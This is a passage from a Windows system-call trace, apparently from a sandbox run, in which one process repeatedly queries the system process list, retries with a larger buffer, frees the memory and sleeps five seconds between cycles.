Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.724] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.725] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.729] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.729] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.735] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.736] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.738] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.740] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.740] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.745] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.746] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.748] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.755] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.756] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.757] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.757] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.759] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.765] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.767] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.768] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.768] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.773] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.775] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.776] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.776] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.777] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.782] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.783] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.785] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.785] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.791] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.792] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.795] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.795] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.800] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.801] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.827] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.829] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.835] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.836] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.838] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.839] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.839] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.845] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.846] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.847] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.848] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.849] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.854] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.855] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.856] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.858] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.858] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.862] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.863] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.864] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.865] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.869] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.870] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.872] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.873] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.876] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.877] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.879] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.879] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.880] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.885] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.885] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.887] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.888] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.891] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.892] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.894] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.894] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.894] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.898] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.899] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.900] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.900] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.901] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.906] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.906] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.909] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.912] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.912] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.914] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.914] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.914] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.919] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.922] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.922] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) 